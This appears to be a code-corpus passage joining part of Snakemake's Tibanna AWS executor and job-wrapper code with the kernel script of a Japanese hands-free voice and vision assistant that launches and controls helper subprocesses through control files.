if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow using callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- a list of input files
output -- a list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- a list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark in this process or to start the
# benchmarking in the executed sub-process. We benchmark this process
# unless the execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt so that the scheduler records an
# error for this job while otherwise ignoring it
raise e
except (Exception, BaseException) as ex:
# this ensures that exception can be re-raised in the parent thread
origin = get_exception_origin(ex, linemaps)
if origin is not None:
log_verbose_traceback(ex)
lineno, file = origin
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
else:
# some internal bug, just reraise
raise ex
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
_v5__main__kernel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
import pyautogui
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
# Interface (control files)
qCtrl_control_kernel = 'temp/control_kernel.txt'
qCtrl_control_speech = 'temp/control_speech.txt'
qCtrl_control_vision = 'temp/control_vision.txt'
qCtrl_control_desktop = 'temp/control_desktop.txt'
qCtrl_control_self = qCtrl_control_kernel
qCtrl_control_bgm = 'temp/control_bgm.txt'
qCtrl_control_browser = 'temp/control_browser.txt'
qCtrl_control_player = 'temp/control_player.txt'
# Python
qPython_main_speech = '_v5__main_speech.py'
qPython_main_vision = '_v5__main_vision.py'
qPython_main_desktop = '_v5__main_desktop.py'
qPython_bgm = '_v5__sub_bgm.py'
qPython_browser = '_v5__sub_browser.py'
qPython_player = '_v5__sub_player.py'
qPython_selfcheck = '_v5_sub_self_check.py'
qPython_smartSpk = '_v5_sub_smart_speaker.py'
qPython_rssSearch = '_v5_sub_rss_search.py'
qPython_weather = '_v5_sub_weather_search.py'
# Common routines
import _v5__qRiKi
qRiKi = _v5__qRiKi.qRiKi_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
import _v5__qLog
qLog = _v5__qLog.qLog_class()
import _v5__qGuide
qGuide= _v5__qGuide.qGuide_class()
qPLATFORM = qRiKi.getValue('qPLATFORM' )
qRUNATTR = qRiKi.getValue('qRUNATTR' )
qHOSTNAME = qRiKi.getValue('qHOSTNAME' )
qUSERNAME = qRiKi.getValue('qUSERNAME' )
qPath_pictures = qRiKi.getValue('qPath_pictures' )
qPath_videos = qRiKi.getValue('qPath_videos' )
qPath_cache = qRiKi.getValue('qPath_cache' )
qPath_sounds = qRiKi.getValue('qPath_sounds' )
qPath_icons = qRiKi.getValue('qPath_icons' )
qPath_fonts = qRiKi.getValue('qPath_fonts' )
qPath_log = qRiKi.getValue('qPath_log' )
qPath_work = qRiKi.getValue('qPath_work' )
qPath_rec = qRiKi.getValue('qPath_rec' )
qPath_s_ctrl = qRiKi.getValue('qPath_s_ctrl' )
qPath_s_inp = qRiKi.getValue('qPath_s_inp' )
qPath_s_wav = qRiKi.getValue('qPath_s_wav' )
qPath_s_jul = qRiKi.getValue('qPath_s_jul' )
qPath_s_STT = qRiKi.getValue('qPath_s_STT' )
qPath_s_TTS = qRiKi.getValue('qPath_s_TTS' )
qPath_s_TRA = qRiKi.getValue('qPath_s_TRA' )
qPath_s_play = qRiKi.getValue('qPath_s_play' )
qPath_v_ctrl = qRiKi.getValue('qPath_v_ctrl' )
qPath_v_inp = qRiKi.getValue('qPath_v_inp' )
qPath_v_jpg = qRiKi.getValue('qPath_v_jpg' )
qPath_v_detect = qRiKi.getValue('qPath_v_detect' )
qPath_v_cv = qRiKi.getValue('qPath_v_cv' )
qPath_v_photo = qRiKi.getValue('qPath_v_photo' )
qPath_v_msg = qRiKi.getValue('qPath_v_msg' )
qPath_d_ctrl = qRiKi.getValue('qPath_d_ctrl' )
qPath_d_play = qRiKi.getValue('qPath_d_play' )
qPath_d_prtscn = qRiKi.getValue('qPath_d_prtscn' )
qPath_d_movie = qRiKi.getValue('qPath_d_movie' )
qPath_d_upload = qRiKi.getValue('qPath_d_upload' )
qBusy_dev_cpu = qRiKi.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qRiKi.getValue('qBusy_dev_com' )
qBusy_dev_mic = qRiKi.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qRiKi.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qRiKi.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qRiKi.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qRiKi.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qRiKi.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qRiKi.getValue('qBusy_s_inp' )
qBusy_s_wav = qRiKi.getValue('qBusy_s_wav' )
qBusy_s_STT = qRiKi.getValue('qBusy_s_STT' )
qBusy_s_TTS = qRiKi.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qRiKi.getValue('qBusy_s_TRA' )
qBusy_s_play = qRiKi.getValue('qBusy_s_play' )
qBusy_v_ctrl = qRiKi.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qRiKi.getValue('qBusy_v_inp' )
qBusy_v_QR = qRiKi.getValue('qBusy_v_QR' )
qBusy_v_jpg = qRiKi.getValue('qBusy_v_jpg' )
qBusy_v_CV = qRiKi.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qRiKi.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qRiKi.getValue('qBusy_d_inp' )
qBusy_d_QR = qRiKi.getValue('qBusy_d_QR' )
qBusy_d_rec = qRiKi.getValue('qBusy_d_rec' )
qBusy_d_telework = qRiKi.getValue('qBusy_d_telework' )
qBusy_d_play = qRiKi.getValue('qBusy_d_play' )
qBusy_d_browser = qRiKi.getValue('qBusy_d_browser' )
qBusy_d_upload = qRiKi.getValue('qBusy_d_upload' )
qRdy__s_force = qRiKi.getValue('qRdy__s_force' )
qRdy__s_fproc = qRiKi.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qRiKi.getValue('qRdy__s_sendkey' )
qRdy__v_mirror = qRiKi.getValue('qRdy__v_mirror' )
qRdy__v_reader = qRiKi.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qRiKi.getValue('qRdy__v_sendkey' )
qRdy__d_reader = qRiKi.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qRiKi.getValue('qRdy__d_sendkey' )
# debug
runMode = 'hud'
qApiInp = 'free'
qApiTrn = 'free'
qApiOut = qApiTrn
if (qPLATFORM == 'windows'):
qApiOut = 'winos'
if (qPLATFORM == 'darwin'):
qApiOut = 'macos'
qLangInp = 'ja'
#qLangTrn = 'en,fr,'
qLangTrn = 'en'
qLangTxt = qLangInp
qLangOut = qLangTrn[:2]
# GUI routines
import _v5__main__gui
GUI = _v5__main__gui.main_gui_class()
class main_kernel:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='on', micLevel='777',
qApiInp='free', qApiTrn='free', qApiOut='free',
qLangInp='ja', qLangTrn='en,fr,', qLangTxt='ja', qLangOut='en',
):
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.qApiInp = qApiInp
self.qApiTrn = qApiTrn
self.qApiOut = qApiOut
self.qLangInp = qLangInp
self.qLangTrn = qLangTrn
self.qLangTxt = qLangTxt
self.qLangOut = qLangOut
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=20, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
# Logging
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
# Initial setup
self.proc_step = '1'
txts, txt = qFunc.txtsRead(qCtrl_control_self)
if (txts != False):
if (txt == '_end_'):
qFunc.remove(qCtrl_control_self)
# Startup conditions (keep in sync with controls.py)
run_priority = 'normal'
main_speech_run = None
main_speech_switch = 'on'
main_vision_run = None
main_vision_switch = 'off'
main_desktop_run = None
main_desktop_switch = 'off'
bgm_run = None
bgm_switch = 'off'
browser_run = None
browser_switch = 'off'
player_run = None
player_switch = 'off'
if (self.runMode == 'debug'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
bgm_switch = 'on'
browser_switch = 'on'
player_switch = 'on'
elif (self.runMode == 'hud'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
bgm_switch = 'on'
browser_switch = 'on'
player_switch = 'on'
elif (self.runMode == 'live'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
bgm_switch = 'on'
browser_switch = 'on'
player_switch = 'on'
elif (self.runMode == 'translator'):
pass
elif (self.runMode == 'speech'):
pass
elif (self.runMode == 'number'):
pass
elif (self.runMode == 'camera'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
elif (self.runMode == 'assistant'):
run_priority = 'below' # below normal priority
main_vision_switch = 'on'
main_desktop_switch = 'on'
elif (self.runMode == 'reception'):
main_vision_switch = 'on'
python_exe = 'python'
if (qPLATFORM == 'darwin'):
python_exe = 'python3'
# Set execution priority
qFunc.setNice(run_priority)
# Main wait loop
self.proc_step = '5'
onece = True
last_alive = time.time()
while (self.proc_step == '5'):
self.proc_beat = time.time()
# Check for termination request
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_self)
if (txts != False):
qLog.log('info', self.proc_id, '' + str(txt))
if (txt == '_end_'):
break
# Check for stop request
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
# Heartbeat (alive) message
if ((time.time() - last_alive) > 30):
qLog.log('debug', self.proc_id, 'alive', display=True, )
last_alive = time.time()
# Fetch from input queue
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
# Thread (child process) setup
speechs = []
if (main_speech_run is None) and (main_speech_switch == 'on'):
cn_s.put(['_guide_', 'main_speech start!'])
if (qRUNATTR == 'python'):
main_speech_run = subprocess.Popen([python_exe, qPython_main_speech,
self.runMode,
self.micDev, self.micType, self.micGuide, self.micLevel,
self.qApiInp, self.qApiTrn, self.qApiOut,
self.qLangInp, self.qLangTrn, self.qLangTxt, self.qLangOut, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
main_speech_run = subprocess.Popen([qPython_main_speech[:-3],
self.runMode,
self.micDev, self.micType, self.micGuide, self.micLevel,
self.qApiInp, self.qApiTrn, self.qApiOut,
self.qLangInp, self.qLangTrn, self.qLangTxt, self.qLangOut, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug'):
speechs.append({ 'text':u'ハンズフリーコントロールシステムをデバッグモードで、起動しました。', 'wait':0, })
elif (self.runMode == 'live'):
speechs.append({ 'text':u'ハンズフリー翻訳機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'hud'):
speechs.append({ 'text':u'ヘッドアップディスプレイ機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'camera'):
speechs.append({ 'text':u'ハンズフリーカメラ機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'assistant'):
speechs.append({ 'text':u'AIアシスタント機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'reception'):
speechs.append({ 'text':u'AI受付機能を、起動しました。', 'wait':0, })
if (not main_speech_run is None) and (main_speech_switch != 'on'):
time.sleep(10.00)
#main_speech_run.wait()
main_speech_run.terminate()
main_speech_run = None
if (main_vision_run is None) and (main_vision_switch == 'on'):
cn_s.put(['_guide_', 'main_vision start!'])
if (qRUNATTR == 'python'):
main_vision_run = subprocess.Popen([python_exe, qPython_main_vision,
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
main_vision_run = subprocess.Popen([qPython_main_vision[:-3],
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'カメラ機能を、起動しました。', 'wait':0, })
if (not main_vision_run is None) and (main_vision_switch != 'on'):
time.sleep(10.00)
#main_vision_run.wait()
main_vision_run.terminate()
main_vision_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'カメラ機能を、終了しました。', 'wait':0, })
if (main_desktop_run is None) and (main_desktop_switch == 'on'):
cn_s.put(['_guide_', 'main_desktop start!'])
if (qRUNATTR == 'python'):
main_desktop_run = subprocess.Popen([python_exe, qPython_main_desktop,
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
main_desktop_run = subprocess.Popen([qPython_main_desktop[:-3],
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'デスクトップ制御機能を、起動しました。', 'wait':0, })
if (not main_desktop_run is None) and (main_desktop_switch != 'on'):
time.sleep(10.00)
#main_desktop_run.wait()
main_desktop_run.terminate()
main_desktop_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'デスクトップ制御機能を、終了しました。', 'wait':0, })
if (bgm_run is None) and (bgm_switch == 'on'):
cn_s.put(['_guide_', 'bgm control start!'])
if (qRUNATTR == 'python'):
bgm_run = subprocess.Popen([python_exe, qPython_bgm, self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
bgm_run = subprocess.Popen([qPython_bgm[:-3], self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'BGM再生機能を、起動しました。', 'wait':0, })
if (not bgm_run is None) and (bgm_switch != 'on'):
qFunc.txtsWrite(qCtrl_control_bgm, txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
time.sleep(10.00)
#bgm_run.wait()
bgm_run.terminate()
bgm_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'BGM再生機能を、終了しました。', 'wait':0, })
if (browser_run is None) and (browser_switch == 'on'):
cn_s.put(['_guide_', 'browser control start!'])
if (qRUNATTR == 'python'):
browser_run = subprocess.Popen([python_exe, qPython_browser, self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
browser_run = subprocess.Popen([qPython_browser[:-3], self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'ブラウザー連携機能を、起動しました。', 'wait':0, })
if (not browser_run is None) and (browser_switch != 'on'):
qFunc.txtsWrite(qCtrl_control_browser, txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
time.sleep(10.00)
#browser_run.wait()
browser_run.terminate()
browser_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'ブラウザー連携機能を、終了しました。', 'wait':0, })
if (player_run is None) and (player_switch == 'on'):
cn_s.put(['_guide_', 'player control start!'])
if (qRUNATTR == 'python'):
player_run = subprocess.Popen([python_exe, qPython_player, self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
player_run = subprocess.Popen([qPython_player[:-3], self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'動画連携機能を、起動しました。', 'wait':0, })
if (not player_run is None) and (player_switch != 'on'):
qFunc.txtsWrite(qCtrl_control_player, txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
time.sleep(10.00)
#player_run.wait()
player_run.terminate()
player_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'動画連携機能を、終了しました。', 'wait':0, })
if (len(speechs) != 0):
qRiKi.speech(id=main_id, speechs=speechs, lang='', )
if (onece == True):
onece = False
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
time.sleep(40)
speechs = []
speechs.append({ 'text':u'全ての準備が整いました。スタンバイしています。', 'wait':0, })
qRiKi.speech(id=main_id, speechs=speechs, lang='', )
# Set ready status
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
# Status response
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '_ready_'
cn_s.put([out_name, out_value])
# Reboot
#if (control == '_reboot_'):
# out_name = 'control'
# out_value = control
# cn_s.put([out_name, out_value])
# Control commands
control = ''
if (inp_name.lower() == 'control'):
control = inp_value
if (control == '_speech_begin_'):
main_speech_switch = 'on'
if (control == '_speech_end_'):
main_speech_switch = 'off'
if (control == '_vision_begin_'):
main_vision_switch = 'on'
if (control == '_vision_end_'):
main_vision_switch = 'off'
if (control == '_desktop_begin_'):
main_desktop_switch = 'on'
if (control == '_desktop_end_'):
main_desktop_switch = 'off'
if (control == '_bgm_begin_'):
bgm_switch = 'on'
if (control == '_bgm_end_') or (control == '_reboot_'):
bgm_switch = 'off'
if (control == '_browser_begin_'):
browser_switch = 'on'
if (control == '_browser_end_') or (control == '_reboot_'):
browser_switch = 'off'
if (control == '_player_begin_'):
player_switch = 'on'
if (control == '_player_end_') or (control == '_reboot_'):
player_switch = 'off'
# Idle wait
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.50)
else:
time.sleep(0.25)
# Shutdown processing
if (True):
# Clear ready status
qFunc.statusSet(self.fileRdy, False)
# Clear busy status
qFunc.statusSet(self.fileBsy, False)
# Ask child processes to terminate
qFunc.txtsWrite(qCtrl_control_kernel ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_speech ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_vision ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_desktop ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_bgm ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_browser ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_player ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
# Stop child processes
if (not main_speech_run is None):
main_speech_run.wait()
main_speech_run.terminate()
main_speech_run = None
if (not main_vision_run is None):
main_vision_run.wait()
main_vision_run.terminate()
main_vision_run = None
if (not main_desktop_run is None):
main_desktop_run.wait()
main_desktop_run.terminate()
main_desktop_run = None
if (not bgm_run is None):
bgm_run.wait()
bgm_run.terminate()
bgm_run = None
if (not browser_run is None):
#browser_run.wait()
browser_run.terminate()
browser_run = None
if (not player_run is None):
#player_run.wait()
player_run.terminate()
player_run = None
# Drain queues
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
# Logging
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
# Signal handling
import signal
def signal_handler(signal_number, stack_frame):
print(os.path.basename(__file__), 'accept signal =', signal_number)
#signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_IGN)
if __name__ == '__main__':
main_name = 'kernel'
main_id = '{0:10s}'.format(main_name).replace(' ', '_')
# Common classes
qRiKi.init()
qFunc.init()
# Logging
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
qLog.log('info', main_id, 'init')
qLog.log('info', main_id, 'example.py runMode, ..., ')
#runMode debug, hud, live, translator, speech, number, camera, assistant, reception,
# Parameters
if (True):
#runMode = 'live'
micDev = '0'
micType = 'bluetooth'
micGuide = 'on'
micLevel = '777'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
if (runMode == 'debug'):
micType = 'bluetooth'
micGuide = 'on'
elif (runMode == 'hud'):
micType = 'bluetooth'
micGuide = 'off'
elif (runMode == 'live'):
micType = 'bluetooth'
micGuide = 'off'
elif (runMode == 'translator'):
micType = 'bluetooth'
micGuide = 'on'
elif (runMode == 'speech'):
micType = 'usb'
micGuide = 'on'
elif (runMode == 'number'):
micType = 'usb'
micGuide = 'on'
elif (runMode == 'camera'):
micType = 'usb'
micGuide = 'off'
elif (runMode == 'assistant'):
micType = 'usb'
micGuide = 'off'
elif (runMode == 'reception'):
micType = 'usb'
micGuide = 'off'
if (len(sys.argv) >= 3):
micDev = str(sys.argv[2]).lower()
if (not micDev.isdigit()):
micGuide = 'off'
if (len(sys.argv) >= 4):
micType = str(sys.argv[3]).lower()
if (len(sys.argv) >= 5):
micGuide = str(sys.argv[4]).lower()
if (len(sys.argv) >= 6):
p = str(sys.argv[5]).lower()
if (p.isdigit() and p != '0'):
micLevel = p
if (len(sys.argv) >= 7):
qApiInp = str(sys.argv[6]).lower()
if (qApiInp == 'google') or (qApiInp == 'watson') \
or (qApiInp == 'azure') or (qApiInp == 'aws') \
or (qApiInp == 'nict'):
qApiTrn = qApiInp
qApiOut = qApiInp
else:
qApiTrn = 'free'
qApiOut = 'free'
if (qApiInp == 'nict'):
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
qLangTrn = 'en,fr,es,id,zh,ko,'
qLangOut = qLangTrn[:2]
